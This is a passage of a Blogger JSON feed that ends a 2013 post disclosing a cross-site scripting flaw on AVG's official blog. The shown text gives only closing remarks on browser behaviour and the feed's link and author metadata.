obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera. \u003Cbr \/\u003EInternet Explorer 8 with the XSS Filter won't execute the malicious scripts. \u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/1965804144990118238\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/cross-site-scripting-in-avg-official.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/1965804144990118238"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/1965804144990118238"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/05\/cross-site-scripting-in-avg-official.html","title":"Cross Site Scripting in AVG Official Blog"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}}]}});